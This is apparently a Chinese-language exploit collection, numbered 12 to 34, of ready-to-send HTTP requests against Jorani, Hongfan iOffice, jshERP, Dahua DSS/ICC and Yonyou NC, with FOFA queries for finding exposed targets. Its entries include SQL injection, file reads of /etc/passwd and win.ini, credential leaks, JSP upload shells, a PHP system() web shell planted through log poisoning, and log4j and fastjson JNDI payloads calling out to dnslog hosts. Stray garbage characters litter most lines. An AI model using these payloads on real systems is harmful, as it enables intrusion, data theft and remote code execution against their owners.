GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1) L* Z: U+ K7 L4 h9 G7 C/ w
Host: 127.0.0.1. L' X4 |8 F3 r8 t
Pragma: no-cache8 e+ o# o% t* p7 y) k9 i+ f% e
Cache-Control: no-cache
% e. k1 b( f+ I. t, p9 ?Upgrade-Insecure-Requests: 1& U1 C0 z5 E; T# t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ C" T0 }" F; L5 S4 y( ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# r% j8 ~. E% G m$ ~5 C
Accept-Encoding: gzip, deflate
1 \+ p2 f( H8 k% B6 [0 N6 ?Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
) q0 g2 _8 z: u5 p. x7 m" G, o' s8 d. aConnection: close5 s; _0 o3 E! L w" ]- e
) J& _/ i. ?( l- ^( X2 W$ t
% }& C: v+ u; g0 M. {& X12. Jorani < 1.0.2 远程命令执行
& k& A. G8 z2 Q# m9 [5 S! Q9 O9 ~FOFA:title="Jorani". Y) _- n3 z& k5 u) S0 {& z' g) N+ @9 h
第一步先拿到cookie' D" c. A Y5 n- m" m
GET /session/login HTTP/1.1( c" O: Y7 q4 A$ ~7 _
Host: 192.168.190.303 {2 H# t; g1 z9 y0 p, r( M
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
! X8 U0 `+ K" BConnection: close5 {1 ?2 `, F9 \( F6 E
Accept-Encoding: gzip" L. ~4 N5 x2 l `
: ^! Q4 C5 q. b2 ?, A$ b- y
) {" u7 u( I+ @( u
响应中csrf_cookie_jorani用于后续请求
8 B# X5 _0 P0 T6 b4 z0 }HTTP/1.1 200 OK
3 d3 V, Z4 K$ m! j1 L( s ^Connection: close
0 ]/ S1 }. m2 m" oCache-Control: no-store, no-cache, must-revalidate
. k7 y' G' o( E0 U3 h3 [% zContent-Type: text/html; charset=UTF-81 C( X. F; X( \' }3 d o8 \- h
Date: Tue, 24 Oct 2023 09:34:28 GMT4 U% n( C; j# _$ A5 W
Expires: Thu, 19 Nov 1981 08:52:00 GMT
2 ^6 b$ l9 l$ v3 r/ m: H: @Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT; A, c7 P6 M3 S# H W
Pragma: no-cache
; v6 e9 U" N+ w" Y: l( ]8 PServer: Apache/2.4.54 (Debian)2 {6 n6 G1 U) C/ s
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/7 o" J" T, b" C9 ^
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
! l! l' A. a7 ?' g" hVary: Accept-Encoding
- Z0 {( [- T, ~5 w( G$ M8 U1 T, ?6 Q: @# B3 e0 f1 s4 c
' u, Q. K" K8 `/ xPOST请求,执行函数并进行base64编码
. u( ^, v7 Y5 E1 n8 o/ `9 W) }POST /session/login HTTP/1.1 V' b! }7 x7 ^0 A3 O* e
Host: 192.168.190.30( Z$ B5 i9 ?0 \! i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36+ A% G+ l$ u. L! y
Connection: close* X0 K* f; i9 K5 J! f. P+ d; O
Content-Length: 252
* W6 A( ^; K! o( X0 LContent-Type: application/x-www-form-urlencoded2 a) s. T9 B3 P5 n
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
* [* m& y0 g6 k4 S) ?Accept-Encoding: gzip
) T. e5 k5 A3 L% W, u. ~( M
; L: ]. S- e' S* {. }csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor8 }+ x: d8 G" L6 l% H1 y
- [6 `# E* k. w# _2 f" u. F& i
) |2 ?% p- ?$ p6 S
6 t+ t* W: B6 O+ p- U9 ^& Q! Y向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
& `5 h4 T0 n" C' ~4 G# ZGET /pages/view/log-2023-10-24 HTTP/1.1, ^; y; P& n+ Y6 e$ E
Host: 192.168.190.30( G0 N; ]4 g+ X8 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* F( K4 `4 c7 V
Connection: close
7 ^* u, V) z$ B4 nCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r, ^& g) T2 K y1 N5 q; f, i" }- t. }- T
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=; u5 E+ A) r$ _; n) ]
X-REQUESTED-WITH: XMLHttpRequest6 T, I0 p$ I; h
Accept-Encoding: gzip
7 y, m' G: T* W3 G& Q8 q7 B9 L
' G9 O" i5 u# }& b5 q
' m+ N" S7 E$ n2 A% I/ p13. 红帆iOffice ioFileDown任意文件读取
2 F- S Y6 m$ s) f6 B( g1 \2 \: vFOFA:app="红帆-ioffice"3 `" Y2 Q. K% `' A. i
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
& e* r( Z T0 eHost: x.x.x.x/ V2 d s8 ?- t3 E5 d8 S- ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( J) p1 x+ a6 B+ f' h- r/ E
Connection: close4 E9 ~% E$ j0 N, F
Accept: */*$ M/ A: i" [5 g) T
Accept-Encoding: gzip
8 S! _- ~! r: B% d8 I$ m: ^ A# b, u7 P3 A" D& N
/ S. N3 P v! B5 c14. 华夏ERP(jshERP)敏感信息泄露' [9 `, m9 C5 Z2 k: N0 Z
FOFA:body="jshERP-boot"/ F; G( a# P7 }$ T9 p
泄露内容包括用户名密码0 }' K. _2 A1 t8 f
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
" Z9 v6 l& c0 O( l7 ]3 I5 XHost: x.x.x.x' r" X9 [- w1 Z2 K: S# B A. k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.364 d* s* W; p3 R( d0 a2 D
Connection: close* c- m# s/ T! y/ c" z
Accept: */*( H: b* _6 S8 n& h) }- U: \' Z' w+ b
Accept-Language: en; l; l2 }- k( m- |# V x
Accept-Encoding: gzip
4 I0 u! [4 }3 v) E
3 q0 ~5 P- ~ F: M- A1 Z6 A+ T& }8 t) n8 r8 m+ b. R/ b
15. 华夏ERP getAllList信息泄露
" k% W- l3 b$ z# jCVE-2024-0490- n% Q* `+ B4 r4 K6 ^0 K
FOFA:body="jshERP-boot" K; a1 D; c2 Q
泄露内容包括用户名密码
M8 q8 |/ V# O5 e' SGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1( I% S$ |3 M9 {! D: [: h
Host: 192.168.40.130:1001 ~/ e5 B, B- |; N& u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
* y" S8 P4 K) x; O$ NConnection: close
4 z4 G0 Z% t6 f5 yAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
2 c/ P' B9 O# p! B0 f3 ~7 t n& bAccept-Language: en- j$ z" [4 b9 ]0 q7 W
sec-ch-ua-platform: Windows, O) b) W$ E/ C& W1 U; S" Z
Accept-Encoding: gzip/ P! o: t, r+ z/ Z0 g5 @
% c, U8 `$ p" |
6 f7 j w8 ~0 \5 G- ]1 x& E2 _2 a16. 红帆HFOffice医微云SQL注入
' t% I3 G, F0 m5 W* h8 VFOFA:title="HFOffice"7 t" a. k1 g X' ~
poc中调用函数计算1234的md5值1 n' S6 `' ~; @- \- Q2 W" `
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
* p0 m" Z. {) g6 z% E3 x9 THost: x.x.x.x
# G: s' i7 T2 C% V! b# a/ @* MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.362 V. W, ?' g% o- s" g, e/ v
Connection: close
. l2 ^. l! ^9 a- ], o7 h' E- YAccept: */** \6 x, D4 \ C4 ]0 S ^( @2 f* `9 B
Accept-Language: en# p1 }3 \, ~! {2 f/ @0 i
Accept-Encoding: gzip
' h8 l1 X; |* ?2 W( _2 |' E. |8 \
* K/ P& K, }3 E, e/ q9 H: j
0 A* B% g% S8 g( {. c* b, \17. 大华 DSS itcBulletin SQL 注入
. O5 [0 N5 [$ C3 `4 E! ]/ @" PFOFA:app="dahua-DSS"$ `: d: a( [: X( \; n, K# n
POST /portal/services/itcBulletin?wsdl HTTP/1.16 r) ^& U% k9 X/ Q) ?
Host: x.x.x.x
. R9 S# Y8 ?- Q( _" O% y GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# O, M8 M% w; l* d
Connection: close
4 j9 z2 i. x5 e/ v3 |& r# HContent-Length: 3456 d, a6 _; N0 M* }, C2 p
Accept-Encoding: gzip
4 d& T" e" g4 y0 H" a9 c' X* O4 O% P# |
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
# a7 E" T9 l" v3 ^<s11:Body>
# w9 a V( T' q5 Z <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
: C6 r9 x8 e" k: |, Y% O) f: z2 J <netMarkings>
* Q# g( y6 l+ H9 J: @0 Y! `- f3 d (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
% Q! G' h6 g) |+ J1 S8 G </netMarkings>$ f. p2 ?# V3 ?3 U% N* g
</ns1:deleteBulletin>
- u4 Q J+ r& H+ Q- E( O </s11:Body>/ A& [ m* d/ t! ~ V
</s11:Envelope>
6 M. [* }7 `4 b
/ q ~' C5 t+ Z
Y/ X6 }, G7 y7 \2 [18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; t5 B+ ?+ x1 O" @6 t- m
FOFA:app="dahua-DSS"% d; X+ l) H; K; Z6 v9 q0 @" |
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
5 q8 m. U3 D% ^9 V- Z( THost: your-ip g" a" x8 p6 _- t- M$ [. C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 U2 D, b3 ~$ _
Accept-Encoding: gzip, deflate/ m; P) L5 I9 Y6 k8 @) _. `9 ]
Accept: */*+ u: a9 A, O( s3 c
Connection: keep-alive" _! X5 t& }6 }& Q
3 `! x( Z) T* `2 ^2 k3 b4 c( I# b4 _9 d5 P; ]
% e, {7 A) Z1 R19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 c; k1 x2 `6 [. q6 I2 A+ i
FOFA:app="dahua-DSS"
$ O6 a/ a1 D) R' q- n7 DGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
6 q- S( x! N$ f d; ~" x$ YHost:3 d" I% X- ]! x: r0 F3 u9 H
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 M* i5 E' b, f( t' ^0 z/ kAccept-Encoding: gzip, deflate
! A: k" b, K7 m5 bAccept: */*
! Y" D$ N9 T# [" k" VConnection: keep-alive. \5 |% \5 @0 z4 L6 D1 A0 h4 v) S
- j& |& \& K" X3 G
6 C( [6 F! k0 S$ {9 \9 T5 a$ i20. 大华ICC智能物联综合管理平台任意文件读取
' Z7 x$ C4 o* t& OFOFA:body="*客户端会小于800*"
- Y( D. t9 d4 W, lGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
% B8 n7 w- c/ c+ OHost: x.x.x.x
" ~! H1 M% Y- ?9 \User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* [8 f+ N2 o4 d% ]Connection: close, k1 S v9 n' x9 q: o
Accept: */*
8 V- p. ?- V3 |+ p1 _0 EAccept-Language: en9 E3 F/ p8 y9 K$ _% M
Accept-Encoding: gzip
9 Y7 }4 C u% a; S( [* k s0 N8 M- s' y2 u- O. D
5 e" {4 u* d1 u# h# c21. 大华ICC智能物联综合管理平台random远程代码执行, L! U, }1 A# s/ C: b
FOFA:icon_hash="-1935899595"9 N( A. N5 L- F0 [5 o. d3 n
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1; l0 [0 I) V, ?( x0 p- B. ^$ N
Host: x.x.x.x
, t4 g3 C" K5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: R1 D/ `7 K. h- j1 R9 }9 l0 \
Content-Length: 161& }6 P: [5 z, |1 A: Q4 r
Accept-Encoding: gzip
. L* V0 f1 b: g8 B. A4 N5 m9 R* @Connection: close
7 a% w8 V3 \ H% OContent-Type: application/json;charset=utf-8
5 Y1 w# h; m% t* w. Y v8 g& K# o$ w$ J: {/ X/ Y9 M6 p3 D. A
{. E7 a# Y. o* S, m( W6 n/ B
"a":{6 ~8 [. X. E; _7 h9 Q
"@type":"com.alibaba.fastjson.JSONObject",
% \1 [ O7 M9 y4 s {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
9 V2 y& c z, n. K }""+ Q1 M8 e, U: n8 _
}7 @! L7 W z n A/ Q
; t1 @; q$ i# e+ n8 o8 o2 g
3 d2 l4 l7 s7 f! f4 K4 L; [- P8 i! G22. 大华ICC智能物联综合管理平台 log4j远程代码执行# [/ Z4 m5 F; J3 M
FOFA:icon_hash="-1935899595"
" S6 K) F' { T7 U$ U& r- G, i# _" r. PPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1 i; E: G4 u& |, q' G7 h
Host: your-ip
9 Z0 _ i; q# | U( S8 C6 F1 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; O$ }. o C2 J% U
Content-Type: application/json;charset=utf-85 Z" m5 M( C% `# G* B; l$ M
: Q+ U* q; K U% f
{
3 N# b% H( ~( F! Z* H/ W8 B, B3 d"loginName":"${jndi:ldap://dnslog}"
4 l( F M* M) Y! C4 ^% ?( |5 O}& I" y! ]. M. Q8 o
' [/ Y5 j' a- y9 ~; l# d
& M9 v& H2 f) m4 f, T e$ y
# y; q8 S2 n- R! [; U23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ m6 D6 u3 |9 e& m2 B KFOFA:icon_hash="-1935899595"
) q$ Z2 E* a5 F0 N+ o% qPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
B% y0 L- G6 Y. n# w6 a" AHost: your-ip
( n1 J3 ~- r$ u* r9 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# H9 U3 N6 D) a1 O# `Content-Type: application/json;charset=utf-8
0 m) b$ p w8 G, JAccept-Encoding: gzip& v/ L8 {( N) B5 [+ b+ o# |8 g
Connection: close
1 p2 R- A+ Y7 U6 q. x; G( Y
- S. |5 x3 y5 V# u. C% j, \, S# ?{8 F0 [& I1 E5 r; I! D
"a":{
1 X& P* H* {+ W5 v/ C$ n "@type":"com.alibaba.fastjson.JSONObject",
! d. L* Q" F4 j3 Z; p0 m {"@type":"java.net.URL","val":"http://DNSLOG"}
2 g/ u6 h: E5 U$ e }""8 n+ Y x! `9 h' L6 m; ~+ ^- i5 n
}
: r6 E8 r& H$ H. {& Z/ Z5 } h* K
7 G0 J- y$ ~% }$ Z' @- G' V" C8 v: L4 f
24. 用友NC 6.5 accept.jsp任意文件上传* }6 _, Z& ~# G' S4 s
FOFA:icon_hash="1085941792" j8 Y' k; R1 @! t
POST /aim/equipmap/accept.jsp HTTP/1.1* ]# z# M* Z8 M. b: @
Host: x.x.x.x- w- F' u* k) D" l8 b2 C
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
* E8 Y" F) n& z5 C2 C- xConnection: close
3 h8 _5 `. C, k5 b% @0 e# `Content-Length: 449
" x$ ? Y }3 ?8 C* I' RAccept: */*% s" s# d( K* `2 \1 o7 \, `
Accept-Encoding: gzip( n- n8 u' d8 X9 ]
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc6 y, G: ?: |7 S. H( F! G
" b3 X9 J& ]9 z5 W; M( J( d" f* J-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 \4 A: A2 u& Z5 k! K
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
5 t, r) f: k1 qContent-Type: text/plain9 ]8 D& h) ~# t) A; v) B
6 A# Q9 ~; g. K5 V( h- x3 G<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>& p3 Q) j$ n! p% L0 K* ]& S4 M1 S
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, F6 _" F2 ^+ R0 P9 p: Y' w: f
Content-Disposition: form-data; name="fname"
0 a: f, l3 C/ T
5 f7 {9 l& I% a4 N9 b% j\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
2 m+ y' T7 B% Z8 I: l-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
1 X4 m' F1 ^0 y9 ?! C+ t
6 \4 Z. O' ^! }0 L- Z- Z+ u, `# x( e* S
25. 用友NC registerServlet JNDI 远程代码执行
T$ E! I9 B( b0 Z) ~1 ~FOFA:app="用友-UFIDA-NC"
0 ^- S" u) x* J: ~POST /portal/registerServlet HTTP/1.1
; C! l6 O- ~- w+ @! \Host: your-ip& q$ m3 @* l W- {0 }7 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ c! S3 T3 U/ T; jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
G2 T$ n3 x; Q$ ?, C! ~& xAccept-Encoding: gzip, deflate
; K$ e- S4 j) H% z! ]: |6 G |Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.62 J' U2 `: A' R+ E
Content-Type: application/x-www-form-urlencoded
' Q1 x5 ]9 {+ p5 U, |# E
( q" w: j4 f! h6 b: }% \type=1&dsname=ldap://dnslog
- w& }, S. O" K9 Y* H9 ^$ z9 k$ e2 v( C* V# M2 S/ T" z j
: w' Y, {1 r1 u3 y- E
: c' k2 [3 @* s) `1 I' R0 E
26. 用友NC linkVoucher SQL注入2 P1 u/ J8 O8 h$ O9 o* ^
FOFA:app="用友-UFIDA-NC"/ L9 A1 b% C& ^3 {9 ~
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1' M: ` I# X8 |5 h g
Host: your-ip( y3 r7 _' E i5 O3 U$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 `1 n* Q% g! T; E1 y! p
Content-Type: application/x-www-form-urlencoded
) a+ P4 w' n3 ?/ H/ I3 Y) lAccept-Encoding: gzip, deflate
% P( c5 A' z. Q( lAccept: */*7 `9 u: f, A5 Q% s$ ]! F/ y
Connection: keep-alive2 V' E! V+ i9 n# u( {/ [ k
9 \0 A2 _; F# n J" F, k: w& Z! K- Z' |
% w4 E. C3 A" ]7 t27. 用友 NC showcontent SQL注入, B; p% u! s5 |- `% d
FOFA:icon_hash="1085941792"/ u# Y( q5 I0 z' _" e
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1, E8 y; u8 _# @
Host: your-ip3 E# K7 M( p+ _" h3 [' S/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) T) b+ X; V; ~
Accept-Encoding: identity
7 z9 i) N) B2 G' i7 A5 Z. GConnection: close. E, z2 l; l# v+ n5 ^
Content-Type: text/xml; charset=utf-8
@$ D; V5 o1 B* }1 h- w8 N$ L4 A. M2 U" h
, y5 }* a4 i( V) W4 I* J6 i' ~4 ^2 g* u28. 用友NC grouptemplet 任意文件上传
, ?% U3 t6 N9 t' v6 CFOFA:icon_hash="1085941792"5 T, e5 x7 J/ A$ d% l7 }& d) T
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
* d+ d" d7 A w* aHost: x.x.x.x
7 t8 r* R6 i2 N8 t. c) KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.360 e5 U# d' t+ b) q" q& R" t: {3 \
Connection: close9 l$ y* H# t; t/ |& R' L
Content-Length: 2686 i5 o( g, r" [6 `* W1 u8 ~$ ]
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
: r- L, l7 N# Z2 Q7 YAccept-Encoding: gzip2 X& M0 m0 W/ Y; S; {2 ]7 S
3 s. Z* F5 y, b/ d9 a( _
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk% a6 A) R' |5 R- D! ]% h( Y
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"5 A9 C% V9 f' H
Content-Type: application/octet-stream
; {# j: _- j3 f0 ]5 C' P9 J3 F* h8 F7 C; K! T( P5 C6 g) L0 [
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
L2 x- U7 _; `3 i+ U# ?- c------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--" l i, Z3 @, K/ D* @
" w7 [! ]2 _1 H- j
: ^' J2 L. @6 S- f/uapim/static/pages/nc/head.jsp
4 @7 t/ W2 V n% m. D; [5 L" A
. P' Y/ l! Q1 y: z. E, y+ [, z29. 用友NC down/bill SQL注入- E9 I) j6 H# Z! Y# j$ |
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& K) a1 y+ {! ?; KGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1, w$ ~: v h7 Z8 S9 J
Host: your-ip
+ p0 f8 W" G8 q0 v+ `' J/ ^* xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ W+ x9 M) R3 U- S( h3 E
Content-Type: application/x-www-form-urlencoded
* h$ F4 X3 T$ H1 @' b7 G) nAccept-Encoding: gzip, deflate
, a" w/ t O7 F J: hAccept: */*
4 e6 T: r" r) PConnection: keep-alive
3 v4 z" J* `9 W4 ]' ]0 r5 l6 g
* u# f9 s) B0 |" s
+ \( a9 }- y3 t. N2 h" R( ]& h0 z5 f30. 用友NC importPml SQL注入
% t. R5 v1 g! t1 F5 M) j0 NFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
3 b0 i% K, q* r1 Z/ ]* \POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.12 d ?2 F% l1 }- K# U6 D2 G
Host: your-ip
4 H% P0 l5 b! j6 Z7 l8 m4 hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
+ r6 H* w- u& W" r4 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 a$ {% |5 j' n r5 YConnection: close
' r2 }1 n2 q5 E2 `5 V% ]: z, p9 r5 ^" k# I% n( Q
------WebKitFormBoundaryH970hbttBhoCyj9V
0 E8 ^4 h v9 ?' C0 q4 d! M sContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
. ]# B) k' g9 P& j. \& r8 W; yContent-Type: image/jpeg, I( ~6 X1 v4 }9 h j5 t
------WebKitFormBoundaryH970hbttBhoCyj9V--
# E( d. i) m' B; V7 G
- P1 x. X; \9 ` A. I$ K9 b* I4 d( y- f* w1 { V
31. 用友NC runStateServlet SQL注入
1 p ?7 l+ H; U) }& Z% Lversion<=6.5 M v9 u2 W; p" J% Y2 ?" D& p( `
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 n- _& }: D0 i! F$ y* _- Q: AGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.17 \) n0 b, t! I/ n6 r B
Host: host
, T; _, S! K! f" dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 D: {) `1 s7 k& |) W4 y! G
Content-Type: application/x-www-form-urlencoded" j# z+ ]# R& s- [
0 [; Y" Q0 U# j4 V! ]- P3 t- r
32. 用友NC complainbilldetail SQL注入
; a' F t5 O2 S7 f5 G7 S# U% gversion= NC633、NC65
$ b2 l% e) _6 U; U1 PFOFA:app="用友-UFIDA-NC"
6 t% k( V" q3 e5 e9 GGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1 A+ @# Q5 ?% q# d( o- j
Host: your-ip
# b& q. B+ [5 F6 I( W% |; x4 O5 ?/ N2 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 {+ Z* W R* Y% D1 F4 f3 f+ mContent-Type: application/x-www-form-urlencoded K4 R% G# v1 l, Y$ T
Accept-Encoding: gzip, deflate4 _6 [0 E: V& G0 `( J/ m6 C
Accept: */*
/ ^1 P; M2 s$ ?" y1 m' KConnection: keep-alive1 v- x9 }2 D" D6 F' V; G7 C' E& G
' U7 R7 Q5 K) S9 Y
# R. u! K7 _4 o" }33. 用友NC downTax/download SQL注入6 A( Q' ^% Q% x! e' W
version:NC6.5FOFA:app="用友-UFIDA-NC"
M o& m$ |$ g. p3 JGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" D3 N- }" n' V+ ]5 O9 H2 VHost: your-ip2 Z4 s' W) h0 X) {9 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) x4 f0 ^8 w4 fContent-Type: application/x-www-form-urlencoded! ]. c# `+ ^( m4 s
Accept-Encoding: gzip, deflate
! w- n' N+ b+ H' t( R% cAccept: */*- r5 T5 S/ S% m9 S- a
Connection: keep-alive' [- x/ w+ A' g5 n
7 e( m7 A3 g% Q0 P- v2 U7 _$ H1 ?) c4 N/ q. o
34. 用友NC warningDetailInfo接口SQL注入- @. w8 u" S! x4 I& p
FOFA:app="用友-UFIDA-NC"
4 {" q$ c5 w5 C0 tGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( c( i# O* g4 z: Y/ m' s( WHost: your-ip
. D i- S- x$ l) S" t, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* [1 O* X J3 f( `7 p/ [Content-Type: application/x-www-form-urlencoded
; @& j; E& f1 p. q5 m5 y2 _Accept-Encoding: gzip, deflate m' b) E9 u {
Accept: */*; o+ `! `" {+ n' e1 k0 e/ `
Connection: keep-alive
4 Z/ v, R l$ z; K/ C7 w0 l4 x! G2 G, U3 ]8 O5 P
